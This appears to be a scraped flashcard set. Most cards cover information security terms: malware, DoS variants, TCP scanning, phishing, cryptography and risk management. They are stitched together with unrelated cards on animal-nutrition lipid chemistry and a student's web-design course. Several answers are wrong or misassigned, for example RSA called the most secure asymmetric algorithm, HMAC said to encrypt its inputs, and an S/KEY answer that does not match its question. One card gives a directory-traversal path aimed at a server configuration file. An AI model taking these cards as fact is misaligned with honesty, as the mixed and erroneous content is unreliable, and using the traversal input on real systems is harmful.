George is the risk manager for a U.S. federal government agency. He is conducting a risk assessment for that agency's IT risk. What methodology is best suited for George's use?
Risk Management Guide for Information Technology Systems (NIST SP800-30)
Earl is preparing a risk register for his organization's risk management program. Which data element is LEAST likely to be included in a risk register?
Risk survey results
SANS
SANS is one of the he most trusted sources for information security training, certification, and research.
Alien SW
SW running on a comp that users are unaware of and use of valuable system resources and can track your web surfing and other personal behaviors -adware -spramware -cookies
What is NOT one of the three tenets of information security?
Safety
Synchronisation
Same keystream used in same position with respect to plaintext/ciphertext
Unsaturation
Saturated -no double bonds Monounsaturated = 1 double bond Polyunsaturated = 2 or more double bonds Usually in "cis" configuration -"trans" configuration found in rumen microorganisms and in chemical hydrogenation. Position of bonds is important
Cryptographic Key (K)
Secret knowledge
Secure Socket Layer (SSL)
Secure communication method which protects web traffic
Sneaky manipulation of TCP
Send TCP FIN packet, if the port is in LISTEN, no reply. if the port is in CLOSED, responds with reset. no connection attempt made. Send a SYN packet, if port is open, responds with SYN/ACK. You return RESET, no connection.
TCP / UDP
Send data between applications. Both use logical ports tied to an application / protocol. Port 80 is an example
Internet Protocol (IP)
Send data between hosts. Header contains: Source host, Destination Host. IP body contains TCP/UDP data, Application data.
POST DoS
Send many POST requests to server with large content length headers. Send the body of the POST 1 character every 10 to 100 seconds. Server hits active connection limit.
Phishing
Sending an email or displaying a web announcement that falsely claims to be from a legitimate enterprise in an attempt to trick the user into surrendering private information.
Record Protocol
Sending: gets application message, breaks it up, encrypts data, transmits in TCP segment. Receiving: decrypted, reassembled then passed to application.
Intrusion Detection System
Senors distributed through network, looking for suspicious activity.
Firewall
Separates trusted and untrusted networks. isolate organizations network from internet. Prevents DoS and only authorized access into network. Limit propagation post infection.
Keylogger
Software or a hardware device that captures and stores each keystroke that a user types on the computers keyboard.
Malware
Software that enters a computer system without the users knowledge or consent and then performs an unwanted and usually harmful action.
[1.4] One of the services provided by AusCERT is a Security Bulletins Service. What sort of information assets do the Security Bulletins relate to?
Software. There are descriptions of vulnerabilities in particular software, sometimes reports that these have been exploited 'in the wild', and some bulletins advise on control measures available.
Threats
Set of circumstances with potential to cause harm to an information asset by compromising stated information security goals.
[7.2] Briefly explain the purpose of the TLS Handshake protocol.
Set up communication
What's the impact of Spoofing?
Similar to the other cyberattacks we've discussed, our client's money is stolen, and they become the victim of fraud and/or identity theft.
Classification
Simple: -Fats and oils: •Esters of fatty acids with glycerol = triglycerides •Fats (solid at room temp), oils (liquid at room temp) -Waxes •Esters of fatty acids with high MW alcohols Complex: -Phospholipids -Glycolipids and other complex lipids Precursor and Derived: -Fatty acids, glycerol, steroids, ketone bodies
As a follow-up to her annual testing, Holly would like to conduct quarterly disaster recovery tests that introduce as much realism as possible but do not require the use of technology resources. What type of test should Holly conduct?
Simulation test
Macro
Sits on an application with scripting capabilities and opens on run.
What is the technique used for phishing
Social engineering
Backdoor
Software code that gives access to a program or a service that circumvents normal security protections.
Internal Source
Source of threat lies within the organisation. Authorized to use information system.
External Source
Source that lies outside the organisation. Not authorized to use information system.
Trans Fatty Acids
Sources:-Hydrogenated fats Soy oil(liquid) to Crisco(solid) done through Hydrogenation, Heat, and catalyst, H2 Meat and milk from ruminants -Biohydrogenation produces some trans fatty acids
When organizations adopt levels of security for a legal defense, they may need to show that they have done what any prudent organization would do in similar circumstances. This is referred to as a(n) ____.
Standard of Due Care
AS/NZS 27002:2006 Clause 7 Asset management: 7.1 Responsibility of Assets.
Standard. 7.1.1 Inventory of assets - type, format, location, backup info, license info and business value of all assets 7.1.2 Ownership of assets 7.1.3 Acceptable use of assets - rules for email + internet use, guidelines for use of mobile devices.
AS/NZS 27002:2006 Clause 7 Asset management: 7.2 Information Classification
Standard. 7.2.1 Classification guidelines - classify based on value, legal reqs., sensitivity, criticality - need for sharing/restricted info and assoc. business impact. - classification varies over time = review + reclassify. 7.2.2 Information handling and labelling - procedures for info labelling particularly of sensitive and critical material.
(Property) Physical assets require
Suitable location Physical security mechanisms (gate etc.) Maintenance Monitoring and logging
Which is faster: Symmetric or Asymmetric ciphers?
Symmetric ciphers are much faster because they are less computationally expensive.
Identifying Security Compromises
Symptoms: Antivirus software detects a problem. Disk space disappears unexpectedly. Pop-ups suddenly appear, sometimes selling security software. Files or transactions appear that should not be there. The computer slows down to a crawl. Unusual messages, sounds, or displays on your monitor. Stolen laptop: 1 stolen every 53 seconds; 97% never recovered. The mouse pointer moves by itself. The computer spontaneously shuts down or reboots. Often unrecognized or ignored problems.
Mandatory access control (MAC)
System wide set of rules applied. Central authority assigns attributes to objects and to subjects. - Subjects assigned clearance levels - Objects assigned classification levels
____ policies address the particular use of certain systems.
Systems-specific
Energy Values: Species Differences
Tables of nutrient composition -Amino acids, minerals, vitamins in ingredients are similar for all species. -Amino acid digestibility may differ by species. -Energy values are species specific
[1.2] What do researchers claim to be able to do to the Jeep Cherokee?
Take over the vehicle remotely, control entertainment system, climate control, driving controls via wireless connection.
Examples of Feed Fats
Tallow Choice White Grease Yellow Grease Poultry Fat Animal / Vegetable Blend Quality Criteria: -Moisture, Impurities, Unsaponifiables (< 1-2%) -Titre (melting point, related to Unsat / Sat FA) -Free Fatty Acids (< 2-5%) -Total fatty acids (90% minimum)
Targeted spear phishing email
Target at specific individual, may have background research etc. so know a Douglas a lecturer in info sec and pretend to be looking for a Phd supervisor.
Security ____________________ are the technical implementations of the policies defined by the organization.
Technologies
[3.6] Employee finds USB in foyer and accesses it. Vulnerabilities?
Technology: may not be effective AVS. People: lack education or process for handling unknown usb Process: process for handling or lost property?
b. encrypts the key and the message
The Hashed Message Authentication Code (HMAC) __________. a. encrypts only the key b. encrypts the key and the message c. encrypts only the message d. encrypts the DHE key only
d. provides cryptographic services in hardware instead of software.
The Trusted Platform Module (TPM) ____________. a. allows the user to boot a corrupted disk and repair it b. is available only on Windows computers running BitLocker. c. includes a pseudorandom number generator (PRNG) d. provides cryptographic services in hardware instead of software.
Dumpster Diving
The act of digging through trash receptacles to find information that can be useful in an attack.
b. in the directory structure of the file system
The areas of a file in which steganography can hide data include all of the following EXCEPT_________. a. in data that is used to describe the content or structure of the actual data b. in the directory structure of the file system c. in the file header fields that describe the file d. in areas that contain the content data itself.
Other Security Objectives to Identify Threats/Attacks
There are more "security" objectives - Traceability and Auditing - Monitoring and Surveillance - Security Assurance - that the security goals are met • "information assurance"
Domain Name System Protocol (DNS)
Ties web addresses and IP addresses together. Application protocol that ties domain names and IP addresses together. System creates a DNS request, routed to the DNS server, DNS server returns the IP address of the website.
TOTP
Time-based One-Time Password. Clock based token.
Keystream
Time-varying function of a key.
[5.3] Explain the basic operation of S/KEY in terms of what is computed and stored on the server side.
To authenticate the first time, the client sends Hn-1(w). The server computes the hash of this value and compares it with the stored Hn(w). If it matches, authentication of the client is complete.
[5.3] Explain the basic operation of S/KEY in terms of what is computed and stored on the client side.
To set up the system, begin with the secret w (key) and apply the hash function repeatedly. After the setup Hn(w) is stored on the server.
Heat production
Total heat production = -Heat increment -Net energy for maintenance HP = HI + NEm Determination -Calorimetry •Direct -measure temperature change in chamber •Indirect -measure O2 and CO2, calculate HP
The ____ strategy attempts to shift risk to other assets, other processes, or other organizations.
Transfer Control
Encoding
Transforming data from one form to another using an encoding algorithm. (NO secret key)
Encryption
Transforming data from one form to another using an encryption algorithm and secret key.
Cryptography
Transforming messages into an unintelligible from and recovering them using secret knowledge
Decryption (D)
Transforming the ciphertext back to the original plaintext, using an algorithm and key
Benefit is the value that an organization realizes by using controls to prevent losses associated with a specific vulnerability.
True
Best business practices are often called recommended practices.
True
Replay attack
Valid data transmission is recorded and retransmitted at a later date.
What is Call forwarding?
The cybercriminal has arranged, either through the phone company or a compromised phone, for all calls to our client's home and/or cell phone number to be forwarded to their phone.
call forwarding
The cybercriminal has arranged, either through the phone company or a compromised phone, for all calls to our client's home and/or cell phone number to be forwarded to their phone.
Pharming - Counterfeit Web Pages
The fraudulent practice of directing users to a bogus website in order to obtain personal information
[5.2] Explain the problem with stored hash values that can be addressed by including a random but known salt value.
The limitation with using straight hash values is that where the passwords are the same, the hash values will be also. Using salted hashes, where the salt is a random number and different for every user, is a better option because it disguises the repetition.
risk analysis
The process by which an organization assesses the value of each asset being protected, estimates the probability that each asset might be compromised, and compares the probable costs of each being compromised with the costs of protecting it.
Enumeration
The process of identifying low hanging fruit and user accounts. Scanning shows you the doors, enumeration identifies how to get through them safely.
[5.3] Explain the basic operation of S/KEY in terms of what is sent each time the protocol is run.
The server then discards Hn(w) and stores Hn-1(w).
Command and Control (C&C or C2)
The structure by which a bot herder gives instructions to zombies in a botnet.
Defense and control : Example Security Technologies
These technologies may be provided by the infrastructure/platform an application builds on, - Networking infrastructure • which may use SSL - Operating system or database system • providing e.g. access control - Programming platform • for instance Java or .NET sandboxing
Attackers
Those who execute attacks, or cause them to be executed, are called attackers
After identifying and performing the preliminary classification of an organization's information assets, the analysis phase moves on to an examination of the ____________________ facing the organization.
Threats
Asset ____________________ is the process of assigning financial value or worth to each information asset.
Valuation
Trojan Horses
Trojan Horse: Masquerades as a benign program while quietly destroying data or damaging your system. example . Download a game: It may be fun but contains hidden code that gathers personal information without your knowledge. A Trojan disguises itself as an entirely legitimate program (such as a screensaver), but behind the scenes it is causing damage such as, - Allowing someone else to gain control of the computer, - Copying personal information, deleting information, monitoring keystrokes - Using email software to pass itself on to other computers. Unlike viruses and worms, Trojans are not self-replicating, they rely on their apparent usefulness to spread between computers. • SomeTrojansworkinisolation. • Some rely on networks, either to transmit stolen information - such as passwords, bank account details or credit card numbers - or to act as back doors to compromised computers. • Theyallowattackerstobypasstheoperatingsystem'ssecurityfeatures and gain access to data or even control the machine over a network.
A DoS attack is a coordinated attempt to deny service by occupying a computer to perform large amounts of unnecessary tasks.
True
A birthday attack is a type of cryptographic attack that is used to make brute-force attack of one-way hashes easier.
True
A certificate authority should actually be categorized as a software security component.
True
A disaster recovery plan (DRP) directs the actions necessary to recover resources after a disaster.
True
A phishing email is a fake or bogus email intended to trick the recipient into clicking on an embedded URL link or opening an email attachment.
True
A surge protector is an example of a preventative component of a disaster recovery plan (DRP).
True
A(n) exposure factor is the expected percentage of loss that would occur from a particular attack.
True
A(n) qualitative assessment is based on characteristics that do not use numerical measures.
True
An alteration threat violates information integrity.
True
Authentication controls include passwords and personal identification numbers (PINs).
True
Essential Fatty Acids
Typically: -Linoleic (ω-6) = C 18:2 Δ 9,12 -Alpha-Linolenic(ω-3)= C18:3 Δ 9, 12,15 Others: -Arachidonic (ω-6)= C 20:4 Δ 5, 8,11, 14 Can be synthesized from 18:2 -EPA* (ω-3) 20:5 Δ5, 8, 11,14,17 -DHA* (ω-3) 22:6 Δ4, 7, 10, 13,16,19 *Can be synthesized from 18:3, but conversion is inefficient
fraggle attack
UDP variant of smurf attack
MITM Interception
Unauthorized MITM observes the info and transmits it.
MITM Interruption
Unauthorized MITM prevents transmission.
URL
Uniform Resource Locator
IP Address
Unique identifier for a host.
MAC Address
Unique identifier of a networked device
Spam
Unsolicited emails
Who's Script Kiddies:?
Unsophisticated computer users who know how to execute programs
An attacker attempting to break into a facility pulls the fire alarm to distract the security guard manning an entry point. Which type of social engineering attack is the attacker using?
Urgency
Example of Detective controls
Use checksum/MAC to detect data corruption.
[5.3] Give an example of a situation in which S/KEY could be used.
Use for authenticating to a system from an untrusted public computer (Internet café?). Don't want to use a reusable password which may be captured and replayed later.
Secure Shell (SSH)
Used for remote login, file transfer and limited VPN service. Provides public key authentication of servers and clients and encrypted communication.
Anabolic Steroids
Used in cattle to improve growth rate and feed efficiency. •Increase protein deposition, decrease fat. •Rate of return $15:1. •Typically get greater response in steers than heifers. •Not used in dairy, pork, poultry
Address Resolution Protocol (ARP)
Used to associate IP and MAC addresses. Link layer protocol used to associate IP and MAC addresses. See if computer knows IP. If not, broadcast "who is this IP?" Then store IP.
Dynamic Host Configuration Protocol (DHCP)
Used to tell computers where networks are. New machine broadcasts DCHP discovery packet, DNS server returns first hop router. Application layer protocol for managing the network. When you turn your laptop on, DCHP gives your MAC address an IP to use, name and IP of DNS server and IP address for the 'first hop'' router.
[9.4] Why is non-repudiation important for e-commerce?
Useful for resolving a dispute about some action that has occurred. Example: whether a contract was signed or a transaction authorised. Digital signatures provide authentication of the message sender, integrity and non-repudiation, so that is useful for e-commerce.
Which of the following is not an advantage to an automated patch update service?
Users can disable or circumvent updates just as they can if their computer is configure to use vendor's online update service
Which of the following is NOT an advantage to an automated patch update service!
Users can disable or circumvent updates just as they can if their computer is configured to use the vendors online update service!
Shoulder Surfing
Watching an authorized user enter a security code on a keypad.
What does Spoofing look like?
We receive an email from a cybercriminal who impersonates one of our clients and confirms a fraudulent wire transfer request.
Vulnerabilities
Weaknesses in a system that could cause harm to information assets.
Once the inventory and value assessment are complete, you can prioritize each asset using a straightforward process known as ____________________ analysis.
Weighted Factor
In a(n) ____, each information asset is assigned a score for each of a set of assigned critical factor.
Weighted Factor Analysis
a. plaintext
What is data called that is to be encrypted by inputting it into a cryptographic algorithm? a. plaintext b. cleartext c. opentext d. ciphertext
b. SHA-3
What is the latest version of the Secure Hash Algorithm? a. SHA-2 b. SHA-3 c. SHA-4 d. SHA-5
Footprinting questions
What software is the target based on? What language does the target use? How can you communicate with the target?
Tailgating
When an unauthorized individual enters a restricted-access building by following an authorized user.
Masquerade/Spoofing
Where one entity pretends to be another in order to deceive others.
c. RSA
Which asymmetric cryptographic algorithm is the most secure? a. SHA-2 b. BTC-2 c. RSA d. ME-14
d. RSA
Which asymmetric encryption algorithm uses prime numbers? a. EFS b. quantum computing c. ECC d. RSA
Which of these is a list of approved email senders?
White list
Transport Layer Security (TLS)
Widely used security protocol, available to any TCP application. Sits between the TCP/IP layer and the application layer. Requirements: send byte stream and interactive data, set of secret keys for entire connection, exchange certificates as part of protocol
If you use Diffie-Hellman Key Agreement alg. do you have to worry about an attack?
Yes. An attacker can still eavesdrop because their is no authentication. When they establish the key they don't have assurances of who they are communicating with.
OWASP ZAP
Zed attack proxy. Intercept and edit HTTP requests.
Which type of attack against a web application uses a newly discovered vulnerability that is not patchable?
Zero-day attack
How can you recover from loss of synchronization?
[RECEIVER] Try keystream offsets or request retransmission
spoofing attack (man-in-the-middle)
a person or program masquerades as another by falsifying data
Conjugated Linoleic Acid (CLA)
a polyunsaturated fatty acid in which the position of the double bonds has moved so that a single bond alternates with two double bonds c-9, t-11 isomer(natural form) has anti-carcinogenic properties.t-10 c-12 isomer found in synthetic forms has anti-obesity effects. Highest in meat and milk from ruminants
data backup
a process in which copies of important computer files are stored in a safe place to guard against data loss
authentication
a security process in which the identity of a person is verified
Nutrient
a substance used by an organism to survive, grow, and reproduce
firewall
a system that prevents a specific type of info from moving between untrusted networks such as the internet and private networks
Cyber crime
a) Technology is the target e.g. hacking, computer viruses, DOS. b) Technology used as tools to enable the offence e.g. Phishing, identity theft, spam.
subject
active entity that requests access to an object or data within an object
proxy server
acts as an intermediary for requests from clients seeking resources from other resources
white box
all background and system information is provided
information security
all processes and procedures designed to protect organizations IS form unauthorized access
Antivirus Software
also known as virus scan software, uses serval techniques to find viruses, worms, and spyware on a computer system; remove them if possible; and keep additional viruses, worms, and spyware from infecting the system
hacker
an individual who subverts computer security without authorization
Hacker
an individual who subverts computer security without authorization tools examples: key logging, packet sniffing, wireless network scanning, social engineering, phishing hacks
something you have
an item such as an ID card, smart card, keychain
heuristic detection
analyse overall structure of code, evaluates coded instruction and logic functions, and looks at type of data within virus or worm
static program analysis
analyse software without actually executing program
conficker worm
another worm with around 10 million infections
threat
any danger to which a system may be exposed
asset
any data, device, or other component of the environment that supports information-related activities
untrusted network
any network external to your organization; wireless is inherently nonsecure
Trusted Network
any network within organization
threat
any potential danger associated with exploitation of vulnerability
malware
any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems
storm worm
anywhere from 1-10 million systems mainly through trickery
administrative control
approved written policies, procedures, standards and guidelines
backup
archived copy of data used to restore original after incident occurs
Interior threats
are networks security security threats that originate from within a network, typically from registered users college students are amongst the most wanted IDs, Why? -bc they have clean credit and more damage can be done because most college students don't check their credit
Polyunsaturated fatty acids:
are susceptible to oxidative damage
SYN flood
attack exploiting vulnerabilities of TCP 3 way handshaking mechanism
phishing
attack method with goal of obtaining personal information, login data, credit card number, or financial data
TLS data transfer problem
attacker can capture and reorder records. solution is to hash sequence number into MAC
Directory Traversal
attacker exploits anything that takes a file path. can use ..\ to access files outside the scope of the program. easily prevented, filter strings. www.example.com..\..\webConf\settings.conf
TLS connection closure problem
attacker forges TCP close segment, one or both parties think there is less data than there actually is. solution is to use record types, type 0: data, type 1: closure.
Network DOS attack
attacker spoof IP.
Nuke attacks
attempt to crash service through exploit in OS.
information security auditing
audit on level of information security in organisation
Biometrics
authenticated person's identity using personal characteristics and retina scans are common dangers and problems of using biometrics
Worm
can replicate itself but does not need a host file moves from system to system through networks rather than by files can be used to delete files, encrypted files, bog down networks, take over computer often move fast: storm worm, con-flicker worm
worm
can replicate itself but does not need a host file. it moves from system to system through networks rather than by files. often moves fast
Nuke: Echo/Chargen loop
character generator protocol: port 19 that sends arbitrary characters to the connecting host. Echo protocol: port 7 that sends back whatever it receives.
What is the name of your local folder
cisweb2
Backdoor / Trapdoor
code designed to make a system simpler to penetrate for a future attack.
Logic/time bomb
code that executes when certain conditions are met
logic bomb
code that would set off a malicious function when specified conditions are met
Malware
code written to cause undesired effects in programs caused by an agent intent on damage. Written with the intent to cause harm
botnet
collection of Internet-connected programs communicating with other similar programs to launch DDoS attack
Phishing Scam
combines both fraudulent e-mail and web sites in order to trick a person into providing private information that can be used for identity theft hard to detect
phishing scam
combines both fraudulent e-mail and websites in order to trick a person into providing private info that can be used for identity theft
viruses, worms, spyware
common forms of malware
hypertext transfer protocol secure
communication protocol for secure communication over computer network
zombie
computer connected to Internet that has been compromised by a hacker and used to perform malicious task
sniffer
computer program or hardware that can intercept and log traffic passing over network
attack tree
conceptual diagram showing how an asset or target might be attacked
network security
concerned with addressing vulnerabilities and threats in computer networks that may or may not be connected to the internet
compliance
conforming to a set of requirements
Wabbit
continually replicating program that aims to exhaust resources
Direction Control Firewall Technique
controls direction of traffic in and out of network. Ingress monitoring and Egress monitoring.
control
countermeasure put into place to mitigate potential risk
internet fraud
crime of deliberately deceiving a person over the internet in order to damage them or obtain property or services unlawfully
identity theft
criminal act of stealing information about a person to assume that person's identity in order to commit fraud or other crimes
Which of these is NOT a state of data that DLP examines
data in-process Data that DLP examines: data in-use data in-transit data at-rest
configuration management database
data repository for information technology organisations
A lock that extends a solid metal bar into the door frame for extra security is the
deadbolt lock
Random Drops
dealing with non spoofed DDoS attacks. Assumes real user will reconnect but zombies won't.
Denial of Service attacks (DOS)
deny resources for legitimate users. Takes up resources until non left for OS.
procedures
detailed step by step tasks that should be performed to achieve a certain goal
stress test
determine stability of a given system or entity
tracking
determine whether source of incident was internal or external
Scanning
determines which of the systems are net accessible . which IP addresses are accessible, any obvious open doors. At its most basic, ping and address to see if its alive, scan the ports to see if they are open. Google the port numbers to get application, google the applications to get vulnerabilities
hacking
devising superficial fixes which are nothing more than auxiliary workarounds for problems
software testing
investigation to provide stakeholders with information about the quality and security of product/service under test
Cross Site Scripting (XSS)
enables attackers to inject client side scripts into web pages viewed by other users. Two main types, stored and reflected. Malicious script stored in the server. Reflected, script is embedded in a URL
cryptography
enables entity to store and transmit data in a form only available only to intended individuals
URL encoding
encodes URL with reserved characters
digital signature
encrypted hash value by sender's private key
tunneling
encrypts each data packet to be sent and places each encrypted packet inside another packet
non-repudiation
enforce someone cannot deny what he/she has done
security administrator
ensure security of environment is performed
certification authority
entity that issues digital certificates
physical control
environmental control of workplace and computing facilities
Online safety practices (experts/non experts)
experts: install software updates, use unique passwords, use two-factor authentication, use strong passwords, use a password manager non experts: use anti software, use strong passwords, change passwords frequently, only visit websites familiar with, don't share personal information
security assessment
explicit study to locate security vulnerabilities and risks
session hijacking
exploitation of valid computer to gain unauthorised access to information or service in computer system
Billion Laughs
exponential attack. XML parser trying to parse 3 gb.
cyber terrorism
extends traditional forms of terrorism to the internet and the web
cyber warfare
extends traditional forms of warfare to the internet and the web
Cyber warfare
extends traditional forms of warfare to the internet and the web, including espionage, psychological warfare, and attacks cyberterrorism
mac
filevault for?
Application Gateways
filter based on application data not just headers. Can see viruses, intrusions and policy violations.
Stateless Filter Firewall
filters packet by packet. Just looks at headers.
regression test
finding defects after a major code change
four pillars of information security
firewall, installing software patches, using security software, & practicing safe, cautious online behavior
corrective control
fixes problems after incident has occurred
software patch
fixes software bugs and flaws and is typically distributed to software users through online software updates
5 page properties you can set up when creating your CSS style sheet
font-family, color, background-color, background-image, text-align, margin, height, padding
CVSS
free and open industry standard for assessing severity of computer system security vulnerabilities
3 types of data backup
full backup: all files in computer selective backup: select which files to backup Three generation backup: preserves three copies of important files incase of system failure or corrupted files restore filed by copying to original location Mac-Time machine Windows- 8-file history
unauthorized access
gaining access to a computer, network, file or other resource without permission; often done with war driving
Unauthorized access
gaining access to a computer, network, file, or other resource without permission
piggybacking
gaining entry to restricted area by "tagging along" with authorised person
security policy
general statement produced by senior management that dictates what role security plays within the organisation
User Control Firewall Technique
gives access to users. Typically, users inside firewall.
need to know
giving access only to information absolutely required to perform job duty
Trojan Horse
greeks vs. trojans seems harmless but carries destructive payload cannot self replicate payload can contain viruses, worms, spyware, backdoors also has RATs
Network Usage Policy
is a document, agreement, or contract that defines acceptable and unacceptable uses of computer and network resourced for a business of organization
Examples of Unauthorized access
hacking into wifi connections, often done in conjunction with war driving interception of communications motivation for hackingL threat, hijacking computers, cyberterrorism, for fun (authorized v. unauthorized hackers and white hat vs. black hat hackers)
Saponification
heating a fat under alkaline conditions -soap making (lard + lye) The Saponification Numberof a fat or oil is defined as the number of milligrams of KOH needed to saponify 1g of fat. Fats with long chain length fatty acids will have a lower number.
A ____ addresses a specific customer situation and often may not be distributed outside that customers organization.
hotfix
A ________________ addresses a specific customer situation and often may not be distributed outside that customer's organization?
hotfix
Webpage address
https://astro.temple.edu/~tuj22891/
What is the full name of my home page?
https://astro.temple.edu/~tuj22891/index.html All About Me, Chandler
[5.4] Briefly explain the operation of a token-based challenge-response system.
i. A challenge is sent in response to an access request. The challenge is generally a number. ii. A legitimate user can respond to the challenge by performing a task which requires use of information only available to the user (and possibly the host). • The response is computed as a cryptographic one-way function of challenge and other info such as key and PIN. iii. User sends the response to the host. If the response is as expected by host, then access is granted.
[5.4] The synchronised one-time password generator is one method to provide user authentication. Describe the operation of the synchronised password generator method using clock-based tokens.
i. The user enters PIN which is used together with clock on token to produce the current value. ii. The value changes for each time period. The user sends the current value to the host. iii. The host computes the same value using the algorithm with inputs: user's ID, PIN and clock value. iv. The host compares the received value with the computed value
risk management
identification, assessment, and prioritisation of risk followed by coordinated and economical application of resources to minimise, monitor, and control the risk
detective control
identify an incident's activities and potentially an intruder
risk management
identify control and minimize impact of threats 1. risk analysis 2. risk mitigation 3. control evaluation
Weaknesses of Dos/DDoS
if flood stops, attack stops. Fix zombies, stop the attack. Attacker's machine can be exposed if not careful.
SYN Scanning
if port is open, responds with SYN/ACK. you return RESET, no connection established.
least privilege
implementation to ensure individuals only accesses need to know resources
improper installation & setup of computer systems
inadequate planning for & control of environment difficulties
errors in computer programming
inadequate planning for & control of equipment malfunctions
accountability
individual must be identifiable and must be held responsible for their action
Covering Tracks
inexperienced attacker leaves evidence. Turn off event logging, clearing event logs, hide malicious files left behind.
File virus
infects some executable and activated on run
something you know
info such as a password or PIN
availability
information must be available to authorised entity
Laws
information security laws seek to protect the civil rights of populations from abuses of information systems and the internet
cross site scripting
inject client-side script into web pages viewed by other users
SQL Injection
injection attack where an attacker can execute malicious SQL statements that control a web applications database.
Trojan Horse
innocent code with malicious code hidden inside. Social engineering since can't spread. Used to escalate privileges.
SQL injection
insert SQL code and run into database server
Spam Injection
inserts spam links into web server. Can divert revenue away from business.
exposure
instance of being exposed to loss
Application Attacks
instead of OS, attack application. Send legitimate traffic maliciously that is guaranteed to get through firewall.
3 types of web page links
internal, external, email
Installing back doors
intruder installs back door to make intrusions easier
Firewall
is a network hardware or software that examines data packets flowing in and sometimes out of a network or computer in order to filter out packets that are potentially dangerous using a firewall is one of the four pillars of information security
Data Backup
is a process in which copies of important computer files are stored in a safe place to guard against data loss data may be lost due to hardware failure, human error, software corruption, hackers, malware, or natural disasters
Authentication
is a security process in which the identity of a person is verified
Encryption
is a security technique that uses high-level mathematical functions and computer algorithms to encode data so that is is unintelligible to all but the intended recipient useful in situations where the information you are storing is confidential or valuable, and there is a possibility that your computer can be accessed by other, lost, or stolen ex. Mac (FileVault) Windows (BitLocker) you can purchase encrypted flash drives
Social Engineering
is an attack in which the perpetrator uses social skills to trick or manipulate a legit employee into providing confidential company info - impersonation - tailgating - shoulder surfing
standard
mandatory activities, actions or rules
Internet fraud
is the crime of deliberately deceiving a person over the internet in order to damage them or to obtain property or services unlawfully
possessed object
item that you must carry to gain access to a computer or facility often used with number password called personal identification number (PIN) 2 step verification
possessed object
item that you must carry to gain access to computer or facility... often used with PIN
Defending against DoS
keep the following updated, AV, OS, software. Firewall set up right. Protocol modification for SYN cookies and random drops. Provide excess bandwidth. Replicated servers. Limit rate of traffic. TCP intercepting firewalls. DDoS scrubbing service.
hacker tools
key-logging, packet-sniffing, wireless network scanning, port-scanning, social engineering
the residential lock most often used for keeping out intruders is the
keyed entry lock
non disclosure agreement
legal contract outlining confidential material, knowledge, or information share between parties that wished to restrict access by third parties
risk
likelihood of a threat agent exploiting a vulnerability and corresponding business impact
Whitelisting
list of acceptable websites/resources/rules. Assumes evil.
Blacklisting
list of banned websites/resources/rules for firewall to reject.
Password choice
longer passwords provide greater security keep passwords secret do not write it down change it frequently
Anti Virus Behavior Blocking
look for suspicious behavior and stops it.
Connection Table
maintained by firewall of list of active TCP connections.
trojan horse
malware that disguises as another program
Virus
piece of self-replicating software program that infects a computer without the user knowledge or permission attaches to a host can be downloaded, emailed, and picked up by removable storage devices (flash drives) embeds itself intro programs, files, and devices used to destroy data or keep systems from working
virus
piece of self-replicating software program, that attaches to a host, that infects a computer w/o the users knowledge or permission. it is used to destroy data or keep systems from working
ICMP Flood
ping flood. Solved by disallow ICMP packets from outside the network.
Buffer Overflows
poorly written programs that kills servers, return error messages to attackers and allows attackers to run own code on machine.
NMap
port scanning software. Gets information of the machine
vulnerability
possibility the system will be harmed by a threat
information security
practice of defending information from unauthorised access, use, disclosure, disruption, modification, perusal inspection, recording or destruction
three-generation backup
preserves three copies of important files
confidentiality
preventing disclosure of information to unauthorised individuals or systems
risk
probability a threat well impact an info resource
authentication
process of confirming the truth of an attribute of a datum or entity
screening
process of disqualifying candidates using detailed examinations
risk analysis
process of understanding impact and criticality of risk
authorisation
process of verifying that a particular identity is permitted to perform a particular action
Worm
program that copies itself through a network. Standalone program that doesn't attach to other files. Operates through networks. Have to be caught early. Slow down traffic to halt worm.
fuzzer
providing invalid, unexpected, or random data as input for a computer program
reverse proxy
proxy server that appears to be ordinary server to clients
guidelines
recommended actions and operational guides when specific standard does not apply
3 image map hotspot tools
rectangle, circle, polygon
risk mitigation
reduce risk to acceptable level to continue conducting business
botnet
refers to a collection of computers autonomously or automatically working together toward some goal
Uniform Resource Locator (URL)
refers to a resource, can also pass data to server. consists of protocol, domain, path, query string
Machine Level Security
refers to actions taken to protect information on a computer that may or may not be connected to a computer network or the internet
machine-level security
refers to actions taken to protect information on a computer that may or may not be connected to a computer network or the internet
permissions
refers to specific access privileges afforded to each network user and each system resource in terms of which files, folder, and drives each user can read, write, & execute
information theft
refers to the access of information by an unauthorized person for financial gain or other benefit
information security
refers to the protection of information systems and the information they manage against unauthorized access, use, manipulation, or destruction, and against the denial of service to authorized users
Information Security
refers to the protection of information systems and the information they manage against unauthorized access, use, manipulation, or destruction, and against the denial of service to authorized users Symantec video states
Permissions
refers to the specific access privileges afforded to each network user and each system resource in terms of which files, folders, and drives each user can read, write, and execute
internet security
refers to the unique threats and defenses associated with computers connected to the internet
wireless security
refers to the unique threats and defenses associated with wireless computer networks war driving
Eicosanoids
regulatory molecules that can be synthesized from omega-3 and omega-6 fatty acids Essential fatty acids are Converted to Eicosanoids
residual risk
remaining risk after placing a control
virus
replicates by inserting copies of itself into other computer programs, data files, or boot sector of hard drive
feasibility study
research activities to verify project worth
user
routinely uses data for work-related tasks
port scanning
searching for open ports of server or host
waredriving
searching for wireless network by person in moving vehicle
Backdoor
secret entry into system
virtual private network
secure, private connection through untrusted network
system hardening
securing a system by reducing surface of vulnerability
black hat
security profession with hacking background
white hat
security professional with info sec skill and knowledge but know hacking background
Wi-fi protected access
security protocol and security certification programs to secure wireless computer networks
log
security relevant chronological record that provide documentary evidence of sequence of activities of an operation, procedure, or event
encryption
security technique that uses high-level mathematical functions and computer algorithms to encode data so that it is unintelligible to all but intended person
trojan horse
seems harmless but carries a destructive payload, cannot self replicate, payload can contain viruses, worms, spyware, backdoors. have RATs
How to import an ste file and what to do when the dialog box pops up asking for a local root folder
select site than manage site and then import the ste file (make sure u have ste file and then select it from your flash drive, double click on your ste file) If pop ups come up you have to navigate to flashdrive find website folder and select your ste and click done,
selective backup
select which files to backup
Virus
self replicating program that installs itself without your consent. Modifies other files. Spread through any medium. Have infection mechanism. Trigger that causes payload to happen. Payload is something bad to happen. Life cycle: Dormancy when virus sits in memory/storage and waits. Propagation when virus replicates. Triggering when a condition is met. Execution is when payload is dropped. Three component models of a Virus - wild component is how much the virus already exists. Damage component is how much damage it could do. Distribution is how quickly it can spread.
Nuke: Land attacks
send a packet with target as both the source and destination. Ties into knot trying to connect with itself.
teardrop attack
send malformed fragments that once reassembled destabilise victim's system
Smurf attack
send many echoes to many smurfs with the source IP as the target. All smurfs send replies packets to target.
